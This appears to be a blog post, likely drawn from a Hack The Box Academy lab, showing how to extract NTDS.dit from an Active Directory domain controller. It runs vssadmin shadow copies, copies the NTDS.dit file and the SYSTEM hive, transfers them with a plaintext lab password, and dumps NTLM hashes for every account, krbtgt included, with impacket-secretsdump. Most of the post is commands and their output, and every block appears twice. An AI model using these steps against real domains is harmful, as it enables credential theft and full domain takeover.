June 11, 2026
Active Directory Attacks — NTDS.dit Extraction
NTDS.dit (New Technology Directory Services Directory Information Tree) is the core database of Active Directory Domain Services, storing…
Osec
2 min read
NTDS.dit (New Technology Directory Services Directory Information Tree) is the core database of Active Directory Domain Services, storing all directory data including user accounts, computer objects, and critically password hashes.
From an offensive security perspective, NTDS.dit extraction is the act of copying this database from a Domain Controller and pairing it with the SYSTEM registry hive, which contains the cryptographic material needed to decrypt stored credentials. By doing so, an attacker can recover NTLM hashes for every account in the domain and either crack them offline or immediately leverage them in Pass-the-Hash attacks.
Because this approach targets the data layer directly and avoids live authentication mechanisms, it provides a stealthy and comprehensive path to full domain compromise, effectively granting control over all users, including Domain Admins.
Attack
From an offensive security standpoint, NTDS.dit extraction is a post-compromise, domain-dominance technique focused on obtaining the entire Active Directory credential set in one operation.
Attack flow:
- Gain elevated access The attacker first obtains Domain Admin privileges or SYSTEM-level access on a Domain Controller.
- Access the Active Directory database They target the AD database file NTDS.dit, which stores all domain credential data.
- Create a safe copy of locked files Since the database is in use, the attacker leverages techniques like Volume Shadow Copy or backup abuse to safely copy it.
- Extract required supporting data The SYSTEM registry hive is also collected to obtain the cryptographic keys needed to decrypt stored credentials.
- Perform offline extraction Using tools such as Impacket, the attacker parses the database and extracts NTLM password hashes.
for the demo we will extract the NTDS.dit using volume shadow copy technique.
first let's confirm the location of the NTDS.dit file.
ls C:\Windows\NTDS\ntds.dit
Directory: C:\Windows\NTDS
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/30/2026 3:40 AM 88080384 ntds.ditls C:\Windows\NTDS\ntds.dit
Directory: C:\Windows\NTDS
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/30/2026 3:40 AM 88080384 ntds.ditnow let's do a volume shadow copy:
vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ef4eadbf-a9ad-445d-9688-d985447e681c}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ef4eadbf-a9ad-445d-9688-d985447e681c}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1now let's copy the files that we need to our local system to process them.
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extracted\NTDS.dit
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\system32\config\system C:\Extracted\system
dir
Volume in drive C has no label.
Volume Serial Number is B8B3-0D72
Directory of C:\extracted
03/30/2026 04:30 AM <DIR> .
03/30/2026 04:30 AM <DIR> ..
03/30/2026 03:40 AM 88,080,384 NTDS.dit
02/16/2022 02:32 PM 17,039,360 systemcmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extracted\NTDS.dit
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\system32\config\system C:\Extracted\system
dir
Volume in drive C has no label.
Volume Serial Number is B8B3-0D72
Directory of C:\extracted
03/30/2026 04:30 AM <DIR> .
03/30/2026 04:30 AM <DIR> ..
03/30/2026 03:40 AM 88,080,384 NTDS.dit
02/16/2022 02:32 PM 17,039,360 systemnow let's transfer it to our attacking machine
smbget smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/extracted.rar -U 'INLANEFREIGHT.LOCAL/htb-student_adm'%'Academy_student_DA!'smbget smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/extracted.rar -U 'INLANEFREIGHT.LOCAL/htb-student_adm'%'Academy_student_DA!'extract them form the .rar archive.
unrar x extracted.rar
UNRAR 6.20 beta 2 freeware Copyright (c) 1993-2022 Alexander Roshal
Extracting from extracted.rar
Extracting NTDS.dit OK
Extracting system OK
All OKunrar x extracted.rar
UNRAR 6.20 beta 2 freeware Copyright (c) 1993-2022 Alexander Roshal
Extracting from extracted.rar
Extracting NTDS.dit OK
Extracting system OK
All OKnow let's extract credentials from it.
impacket-secretsdump -ntds NTDS.dit -system system LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: a9707d46478ab8b3ea22d8526ba15aa6
[*] Reading and decrypting hashes from NTDS.dit
INLANEFREIGHT.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
ACADEMY-EA-DC01$:1002:aad3b435b51404eeaad3b435b51404ee:458260fc91c9ac58626bdf85ce8d51eb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
ACADEMY-EA-MS01$:1107:aad3b435b51404eeaad3b435b51404ee:b5bcf4eba76a7f70d095871d00580bb5:::
ACADEMY-EA-WEB01$:1108:aad3b435b51404eeaad3b435b51404ee:1c7e2801ca48d0a5e3d5baf9e68367ac:::
INLANEFREIGHT.LOCAL\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\AVazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
inlanefreight.local\PFalcon:1113:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
inlanefreight.local\FAnthony:1114:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
inlanefreight.local\WDillard:1115:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
inlanefreight.local\LBradford:1116:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::
inlanefreight.local\SGage:1117:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::
inlanefreight.local\ASanchez:1118:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::
inlanefreight.local\DBranch:1119:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::
inlanefreight.local\CCruz:1120:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::
inlanefreight.local\NJohnson:1121:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::
inlanefreight.local\MHolliday:1122:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
inlanefreight.local\MShoemaker:1123:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::
inlanefreight.local\ASlater:1124:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::
inlanefreight.local\KPrentiss:1125:aad3b435b51404eeaad3b435b51404ee:9b12a0a33aabdbd845cd3ed5070820b9:::
inlanefreight.local\GDavis:1126:aad3b435b51404eeaad3b435b51404ee:1ab3ee9bd2e35ad25670481d9d1b4e0f:::
inlanefreight.local\JMcDaniel:1127:aad3b435b51404eeaad3b435b51404ee:1e22653293daff337f58d32695c999d0:::
inlanefreight.local\JJones:1128:aad3b435b51404eeaad3b435b51404ee:a90431144f59bc8aeecc28038d6bda40:::
inlanefreight.local\TGarcia:1129:aad3b435b51404eeaad3b435b51404ee:8a4c52fc75514ddb740971e26b9311d9:::
inlanefreight.local\MHarrison:1130:aad3b435b51404eeaad3b435b51404ee:4befb46af523d5899f605eb13fa91788:::
inlanefreight.local\NHight:1131:aad3b435b51404eeaad3b435b51404ee:9dbd90a7155594a3950791b2a20b90dd:::
inlanefreight.local\WBaird:1132:aad3b435b51404eeaad3b435b51404ee:f30ba55f393d631be27cc76b385af8f9:::
inlanefreight.local\MOchoa:1133:aad3b435b51404eeaad3b435b51404ee:0d2134c49735d6b979b0ee3adf520d4b:::
inlanefreight.local\JHopkins:1134:aad3b435b51404eeaad3b435b51404ee:eae13b6506b3112fee868ba26c1ade92:::
inlanefreight.local\HBlea:1135:aad3b435b51404eeaad3b435b51404ee:4bfd7bb2c984e909198c2a4033d58806:::
inlanefreight.local\CPennington:1136:aad3b435b51404eeaad3b435b51404ee:4bf9a20fec430ee1044186d6648ff53b:::
inlanefreight.local\DGlen:1137:aad3b435b51404eeaad3b435b51404ee:e931895043becfd796833abaee641077:::
inlanefreight.local\KHartsfield:1138:aad3b435b51404eeaad3b435b51404ee:4bb3b317845f0954200a6b0acc9b9f9a:::
inlanefreight.local\RRamirez:1139:aad3b435b51404eeaad3b435b51404ee:0a280608abf79943bf7a2e40fc784ead:::
inlanefreight.local\OHafner:1140:aad3b435b51404eeaad3b435b51404ee:7ee9b4d39c6820c17e12c85f9f02e9cc:::
inlanefreight.local\LMatthews:1141:aad3b435b51404eeaad3b435b51404ee:8289a143c7331424c71d6f1b72c12a65:::
inlanefreight.local\LOkeefe:1142:aad3b435b51404eeaad3b435b51404ee:1628488e442316500a176701e0ac3c54:::
inlanefreight.local\RBurrows:1143:aad3b435b51404eeaad3b435b51404ee:d7ac98d21ce1a53f95439a284b1cc6f0:::
inlanefreight.local\CSteele:1144:aad3b435b51404eeaad3b435b51404ee:181f57e0ff08a1f715faefe0e37fac33:::
inlanefreight.local\JWallace:1145:aad3b435b51404eeaad3b435b51404ee:def7529e4a2ef752ac49748b5e14fbed:::
inlanefreight.local\DLewis:1146:aad3b435b51404eeaad3b435b51404ee:cab905919f78bc291d18602fa2637006:::
inlanefreight.local\JSantiago:1147:aad3b435b51404eeaad3b435b51404ee:b112ae11884f96fae6b6bf45763975bf:::impacket-secretsdump -ntds NTDS.dit -system system LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: a9707d46478ab8b3ea22d8526ba15aa6
[*] Reading and decrypting hashes from NTDS.dit
INLANEFREIGHT.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
ACADEMY-EA-DC01$:1002:aad3b435b51404eeaad3b435b51404ee:458260fc91c9ac58626bdf85ce8d51eb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
ACADEMY-EA-MS01$:1107:aad3b435b51404eeaad3b435b51404ee:b5bcf4eba76a7f70d095871d00580bb5:::
ACADEMY-EA-WEB01$:1108:aad3b435b51404eeaad3b435b51404ee:1c7e2801ca48d0a5e3d5baf9e68367ac:::
INLANEFREIGHT.LOCAL\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\AVazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
inlanefreight.local\PFalcon:1113:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
inlanefreight.local\FAnthony:1114:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
inlanefreight.local\WDillard:1115:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
inlanefreight.local\LBradford:1116:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::
inlanefreight.local\SGage:1117:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::
inlanefreight.local\ASanchez:1118:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::
inlanefreight.local\DBranch:1119:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::
inlanefreight.local\CCruz:1120:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::
inlanefreight.local\NJohnson:1121:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::
inlanefreight.local\MHolliday:1122:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
inlanefreight.local\MShoemaker:1123:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::
inlanefreight.local\ASlater:1124:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::
inlanefreight.local\KPrentiss:1125:aad3b435b51404eeaad3b435b51404ee:9b12a0a33aabdbd845cd3ed5070820b9:::
inlanefreight.local\GDavis:1126:aad3b435b51404eeaad3b435b51404ee:1ab3ee9bd2e35ad25670481d9d1b4e0f:::
inlanefreight.local\JMcDaniel:1127:aad3b435b51404eeaad3b435b51404ee:1e22653293daff337f58d32695c999d0:::
inlanefreight.local\JJones:1128:aad3b435b51404eeaad3b435b51404ee:a90431144f59bc8aeecc28038d6bda40:::
inlanefreight.local\TGarcia:1129:aad3b435b51404eeaad3b435b51404ee:8a4c52fc75514ddb740971e26b9311d9:::
inlanefreight.local\MHarrison:1130:aad3b435b51404eeaad3b435b51404ee:4befb46af523d5899f605eb13fa91788:::
inlanefreight.local\NHight:1131:aad3b435b51404eeaad3b435b51404ee:9dbd90a7155594a3950791b2a20b90dd:::
inlanefreight.local\WBaird:1132:aad3b435b51404eeaad3b435b51404ee:f30ba55f393d631be27cc76b385af8f9:::
inlanefreight.local\MOchoa:1133:aad3b435b51404eeaad3b435b51404ee:0d2134c49735d6b979b0ee3adf520d4b:::
inlanefreight.local\JHopkins:1134:aad3b435b51404eeaad3b435b51404ee:eae13b6506b3112fee868ba26c1ade92:::
inlanefreight.local\HBlea:1135:aad3b435b51404eeaad3b435b51404ee:4bfd7bb2c984e909198c2a4033d58806:::
inlanefreight.local\CPennington:1136:aad3b435b51404eeaad3b435b51404ee:4bf9a20fec430ee1044186d6648ff53b:::
inlanefreight.local\DGlen:1137:aad3b435b51404eeaad3b435b51404ee:e931895043becfd796833abaee641077:::
inlanefreight.local\KHartsfield:1138:aad3b435b51404eeaad3b435b51404ee:4bb3b317845f0954200a6b0acc9b9f9a:::
inlanefreight.local\RRamirez:1139:aad3b435b51404eeaad3b435b51404ee:0a280608abf79943bf7a2e40fc784ead:::
inlanefreight.local\OHafner:1140:aad3b435b51404eeaad3b435b51404ee:7ee9b4d39c6820c17e12c85f9f02e9cc:::
inlanefreight.local\LMatthews:1141:aad3b435b51404eeaad3b435b51404ee:8289a143c7331424c71d6f1b72c12a65:::
inlanefreight.local\LOkeefe:1142:aad3b435b51404eeaad3b435b51404ee:1628488e442316500a176701e0ac3c54:::
inlanefreight.local\RBurrows:1143:aad3b435b51404eeaad3b435b51404ee:d7ac98d21ce1a53f95439a284b1cc6f0:::
inlanefreight.local\CSteele:1144:aad3b435b51404eeaad3b435b51404ee:181f57e0ff08a1f715faefe0e37fac33:::
inlanefreight.local\JWallace:1145:aad3b435b51404eeaad3b435b51404ee:def7529e4a2ef752ac49748b5e14fbed:::
inlanefreight.local\DLewis:1146:aad3b435b51404eeaad3b435b51404ee:cab905919f78bc291d18602fa2637006:::
inlanefreight.local\JSantiago:1147:aad3b435b51404eeaad3b435b51404ee:b112ae11884f96fae6b6bf45763975bf:::and like that ! we took over all the users on the domain ! including krbtgt which we will use it to perform the Golden Ticket Attack in the next article ;)
make sure you subscribe so you get notified anytime a new article got droped !
Follow me on X : https://x.com/osec403